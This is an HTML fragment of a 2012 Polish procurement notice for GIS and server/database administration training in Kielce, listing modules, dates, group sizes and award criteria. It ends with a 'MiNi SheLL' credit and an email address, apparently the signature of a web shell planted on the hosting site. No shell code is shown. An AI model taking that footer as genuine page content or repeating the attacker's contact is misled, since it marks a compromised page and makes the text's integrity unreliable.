<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kompleksowa realizacja 
merytoryczna i obsługa techniczno-logistyczna 
usług szkoleniowych z zakresu systemu informacji przestrzennej ( SIP).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
Moduł I-Szkolenie:Wprowadzenie do systemów informacji przestrzennej SIP  i możliwości zastosowania technologii SIP w działaniach praktycznych.
Moduł II-Szkolenie: Specjalistyczne, certyfikowane szkolenie z zakresy narzędzi SIP: GeoMedia Proffesional, GeoMedia Sdi Pro, GeoMedia Web Map Proffesional, związane tematycznie z realizacją projektu GUGiK Geoportal2

Terminy szkoleń;
Moduł I - nie wcześniej niż 8 września 2012 r. - nie później niż 28 września 2012 r.
Moduł II - nie wcześniej niż 6 sierpnia 2012 r. - nie później niż 28 września 2012 r.
  Dokładny termin rozpoczęcia szkolenia ustali Zamawiający z Wykonawcą, któremu zostanie udzielone zamówienie najpóźniej 14 dni przed terminem rozpoczęcia szkolenia (chyba, że strony ustalą termin krótszy).
Terminy szkoleń w I części zamówienia  nie mogą się pokrywać, co oznacza, że dla każdej grupy szkolenie ma odbyć się w innym terminie.
Miejsce szkolenia dla modułu I -miasto Kielce
Moduł I -liczba uczestników szkolenia 50 osób tj.  5 grup po 10 osób .Zamawiajacy zastrzega sobie prawo do zmiany liczby osób w grupach. Czas trwania szkolenia 1 dniowe -8 godzin. przyjmuje się , że czas jednej godziny leksyjnej =45 minutom.
Moduł II-liczba uczestników szkolenia 3 pracowników 1 grupa ( 2 tury po 3 dni) razem 6 dni szkolenia 8 godzin =48 godzin. Przyjmuje się , że czas jednej godziny leksyjnej =45 minutom.
Miejsce organizacji szkolenia wyjazdowego dla modułu II-musi być  poza   granicami administracyjnymi miasta Kielc jednak nie dalej niż 400 km, z zastrzeżeniem, że dzień wyjazdu  będzie  dniem  poprzedzającym pierwszy  dzień rozpoczynający szkolenie a dzień powrotu dniem następnym po ostatnim dniu szkolenia 
 (Zaoferowanie przez   Wykonawcę   miejsca   organizacji   szkolenia,   które   nie   będzie   spełniało wymagania  Zamawiającego  w  zakresie  minimalnej  maksymalnej  odległości  miejsca szkolenia od  granic  administracyjnych  miasta  Kielc,  spowodowuje  odrzucenie oferty wykonawcy na podstawie art. 89 ust. 1 pkt 2 ustawy pzp.). Wykonawca zapewni uczestnikom zakwaterowanie w trakcie trwania szkolenia jak również 
w dniu poprzedzającym dzień rozpoczęcia szkolenia oraz dzień następny po ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 38.22.10.00-0, 72.42.10.00-7, 72.51.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kompleksowa realizacja 
merytoryczna i obsługa techniczno-logistyczna 
usług szkoleniowych z zakresu systemu informacji przestrzennej ( SIP).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II
Moduł I- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym kurs podstawowy (cz.1) - Szkolenie MS6420 Fundamentals of Windows Server_2008
Moduł II- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym  - administrator  systemu (cz.2)- Szkolenie MS6427 Configuring and Troubleshooting Internet Information Services  
Moduł III- Szkolenie Specjalistyczne, certyfikowane z zakresu administrowania oprogramowaniem systemowym  - administrator systemu (cz.3 + egz.)-Szkolenie MS6421 Configuring and Troubleshooting a Windows Server 2008 Network
 Moduł IV- Szkolenie Specjalistyczne z zakresu administrowania oprogramowaniem bazodanowym - Szkolenie 5115 Oracle Database 11g Administration Workshop I 
Moduł V- Szkolenie Specjalistyczne z zakresu administrowania oprogramowaniem narzędziowym dla administracji - Szkolenie 5148 Oracle Database 11g Administration Workshop II 
Terminy szkoleń dla wszystkich modułów z II części zamóweinia:nie wcześniej niż 16-07-2012r- nie później niż 28-09-2012r.3. Dokładny termin rozpoczęcia szkolenia ustali Zamawiający z Wykonawcą, któremu zostanie udzielone zamówienie najpóźniej 14 dni przed terminem rozpoczęcia szkolenia (chyba, że strony ustalą termin krótszy).
Terminy szkoleń w II części zamówienia  nie mogą się pokrywać, co oznacza, że dla każdej grupy szkolenie ma odbyć się w innym terminie.
Liczba uczestników:
Moduł I -2 pracowników -1 gr. -5-dniowe po 8 godzin dziennie ( razem 40 godzin). Przyjmuje sie, że czas jednej godziny leksyjnej=45 minut
Moduł II-2 pracowników -1 gr. -3-dniowe po 8 godzin dziennie ( razem 24 godziny). Przyjmuje sie, że czas jednej godziny leksyjnej=45 minut
Moduł III-2 pracowników -1 gr. -5-dniowe po 8 godzin dziennie ( razem 40 godzin). Przyjmuje sie, że czas jednej godziny leksyjnej=45 minut
Moduł IV-2 pracowników -1 gr. -5-dniowe po 8 godzin dziennie ( razem 40 godzin). Przyjmuje sie, że czas jednej godziny leksyjnej=45 minut
Moduł V-2 pracowników -1 gr. -5-dniowe po 8 godzin dziennie ( razem 40 godzin). Przyjmuje sie, że czas jednej godziny leksyjnej=45 minut
Miejsce organizacji szkolenia dla II części:
musi być  poza   granicami administracyjnymi miasta Kielc jednak nie dalej niż 400 km, z zastrzeżeniem, że dzień wyjazdu  będzie  dniem  poprzedzającym pierwszy  dzień rozpoczynający szkolenie a dzień powrotu dniem następnym po ostatnim dniu szkolenia 
 (Zaoferowanie przez   Wykonawcę   miejsca   organizacji   szkolenia,   które   nie   będzie   spełniało wymagania  Zamawiającego  w  zakresie  minimalnej  maksymalnej  odległości  miejsca szkolenia od  granic  administracyjnych  miasta  Kielc,  spowodowuje  odrzucenie oferty wykonawcy na podstawie art. 89 ust. 1 pkt 2 ustawy pzp.). Wykonawca zapewni uczestnikom zakwaterowanie w trakcie trwania szkolenia jak również 
w dniu poprzedzającym dzień rozpoczęcia szkolenia oraz dzień następny po ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 38.22.10.00-0, 72.42.10.00-7, 72.51.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com